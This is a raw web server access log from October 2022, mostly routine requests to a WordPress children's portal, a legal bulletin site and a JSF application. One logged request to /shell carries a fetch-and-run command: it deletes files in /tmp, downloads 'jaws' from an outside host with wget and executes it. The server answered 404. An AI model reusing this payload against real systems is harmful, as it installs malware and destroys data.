186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
186.84.22.233 - - [02/Oct/2022:19:45:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
186.84.22.233 - - [02/Oct/2022:19:45:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
186.84.22.233 - - [02/Oct/2022:19:45:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
186.84.22.233 - - [02/Oct/2022:19:45:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
186.84.22.233 - - [02/Oct/2022:19:45:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/imagenes-con-marcos-pa%CC%81gina-de-nin%CC%83os-aula-soratama.jpg HTTP/1.1" 200 42527
186.84.22.233 - - [02/Oct/2022:19:45:05 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os4.jpg HTTP/1.1" 200 27901
186.84.22.233 - - [02/Oct/2022:19:45:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
181.234.192.116 - - [02/Oct/2022:19:45:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.22.233 - - [02/Oct/2022:19:45:06 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Recorrido-virtual-Aula-Soratama.mp4 HTTP/1.1" 206 5687960
181.234.192.116 - - [02/Oct/2022:19:45:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.234.192.116 - - [02/Oct/2022:19:45:25 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [02/Oct/2022:19:43:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
186.148.168.245 - - [02/Oct/2022:19:46:13 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 7208
186.148.168.245 - - [02/Oct/2022:19:46:16 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 193
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:16 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 40573
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 193
186.148.168.245 - - [02/Oct/2022:19:46:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 10620
186.148.168.245 - - [02/Oct/2022:19:46:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 17017
207.46.13.89 - - [02/Oct/2022:19:46:23 -0500] "GET /BLA/resoluciones/AUTOS%202022/3612.pdf HTTP/1.1" 200 973917
186.148.168.245 - - [02/Oct/2022:19:46:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 17017
186.148.168.245 - - [02/Oct/2022:19:46:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 55696
186.148.168.245 - - [02/Oct/2022:19:46:36 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
186.148.168.245 - - [02/Oct/2022:19:46:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.148.168.245 - - [02/Oct/2022:19:46:37 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 200 28091
181.56.93.102 - - [02/Oct/2022:19:47:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 911
216.245.221.92 - - [02/Oct/2022:19:47:56 -0500] "HEAD / HTTP/1.1" 200 -
82.157.7.213 - - [02/Oct/2022:19:48:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ neverwinwlaq.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [02/Oct/2022:19:48:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:19:48:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:19:49:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
5.45.207.152 - - [02/Oct/2022:19:51:40 -0500] "-" 408 -
207.46.13.40 - - [02/Oct/2022:19:52:21 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12502
216.245.221.92 - - [02/Oct/2022:19:52:56 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:19:53:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
181.32.90.245 - - [02/Oct/2022:19:54:12 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.32.90.245 - - [02/Oct/2022:19:54:12 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.32.90.245 - - [02/Oct/2022:19:54:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.24.16.24 - - [02/Oct/2022:19:55:17 -0500] "GET /kwssiamovil/sm/des/cjson/pre?f=9&x=U2FsdGVkX19vpnVF0nGKqtyvKUUNkEhKq88669L91bXFJyEn1vsy1xIOXVn/GyYw HTTP/1.1" 200 25142
190.24.16.24 - - [02/Oct/2022:19:56:02 -0500] "GET /kwssiamovil/sm/des/cjson/pre?f=9&x=U2FsdGVkX19vpnVF0nGKqtyvKUUNkEhKq88669L91bXFJyEn1vsy1xIOXVn/GyYw HTTP/1.1" 200 25142
201.245.192.253 - - [02/Oct/2022:19:56:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42172
172.22.2.4 - - [02/Oct/2022:19:54:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.102 - - [02/Oct/2022:19:56:24 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [02/Oct/2022:19:56:25 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [02/Oct/2022:19:56:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
201.245.192.253 - - [02/Oct/2022:19:56:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45024
172.22.2.4 - - [02/Oct/2022:19:55:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
186.29.181.14 - - [02/Oct/2022:19:57:13 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.29.181.14 - - [02/Oct/2022:19:57:13 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.29.181.14 - - [02/Oct/2022:19:57:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.202 - - [02/Oct/2022:19:57:19 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [02/Oct/2022:19:57:56 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:19:58:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
207.46.13.84 - - [02/Oct/2022:19:59:11 -0500] "GET /BLA/resoluciones/00000853.tif HTTP/1.1" 404 1018
172.22.2.4 - - [02/Oct/2022:20:00:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.81 - - [02/Oct/2022:20:02:14 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:20:02:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:20:01:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [02/Oct/2022:20:03:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
157.55.39.202 - - [02/Oct/2022:20:05:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20200-249.tif HTTP/1.1" 200 6293319
216.245.221.92 - - [02/Oct/2022:20:07:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:20:06:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:20:08:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:20:07:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
186.30.172.6 - - [02/Oct/2022:20:09:47 -0500] "GET /alcaldia-de-bogota-y-gobernacion-de-cundinamarca-suscriben-convenio-para-implementar-pagos-por-servicios-ambientales-en-la-bogota-region.html HTTP/1.1" 200 1133
186.102.32.19 - - [02/Oct/2022:20:10:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/Ekf5bflVUmH/2OywcGe7aW8y0RXtmCwfx5/FFWSVB1au2oWb8Sf2SA1DVDnlh2za0KTFCf1OfSI/VmS6Y0OOl4OtN0v0+5hMm2WsFte5WUqb1zFQ+JO9G0TtVDGpnF+bPlqAKi2KgJ9Akj8W4flGbJKRsxAHj4IuZEfKiGd8Pt5ZYMf11Xy1NAV1f6TDHRv6JDcUr8tLVqK1/jodI9in8bmdQ5tc9WREsK0g81afRZmxdm/IMR/HYE/tGz6nvVQcXvXewZalS1Q==&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
186.102.32.19 - - [02/Oct/2022:20:10:06 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
186.102.32.19 - - [02/Oct/2022:20:10:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Xa7KOAdPB8rHWM2HCPW9PQm5Eq9VGZAYU45cYwoEOM+8avTDzuYg3e1RU/sQloBE2fIIHkaxYJsJ3LS1Kx4W/6OtnOnrcrKUhq19qn0M5NA8jFYPJn9BGTSNUh8VwaU7x4U8wLrMMMxiP7gOBulfrPYI04TpcMOs=&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
186.102.32.19 - - [02/Oct/2022:20:10:07 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/Ci9eI8phWCTl6tUvnm0PZlXiH8Wnyj0coU9hZLWgVF9DQME45/EHwF5VLu6i8YBikqJw4TfRi2+St8wjBbk+0HCbTovC53dUTRAIeMS10g1o4lcHb50oRGOt8iFW4qvav7l/E16PTyLRXMQX8pWnm/Nx08mGUMjw=&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
186.102.32.19 - - [02/Oct/2022:20:10:07 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/eBS45y7dEvQS9GF+IZc9zEjMeKzBXVEH8IGyxpQ3wP9LJnbwByuqjLm7KOh0S8r+YbHAVL32LtUj/afKcy2JEMaRpCEAknSaylTWwIu7ROQ8QfSOCRJjpTlY07sjSytK87EgHc1q7pp2fShA60KZYf2DgZe3FjUk=&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
186.102.32.19 - - [02/Oct/2022:20:10:07 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX185qCQ+ON7n3U/CsSP1WeFAAUFiWGN4Fn6XAPallGkc2E1RDHqq6+IxCQyhPaWXeoEWlx01BbMU0ENrUgPL+cO0C/4mBbcItMppcKRzNpK6byVtFvSwAa94uCm9DD4f+gZ9VTHGna4S5Gbdt670zgyxVqW9lpwRKvpxi/I1+OX+QToKCAVvSdQr&u=U2FsdGVkX19Z7GBh6sb/gyhe7FS5mlkeSFi8OmrxZ7k=&y=U2FsdGVkX1/drYKpD+G3mRHU5miP/VA+9yfdsPtfmtrihWQEPaMtAe/4xhYXxmLV HTTP/1.1" 200 25
66.249.64.15 - - [02/Oct/2022:20:10:46 -0500] "-" 408 -
207.46.13.84 - - [02/Oct/2022:20:12:03 -0500] "GET /BLA/resoluciones/00000863.tif HTTP/1.1" 404 1018
5.255.253.138 - - [02/Oct/2022:20:12:14 -0500] "-" 408 -
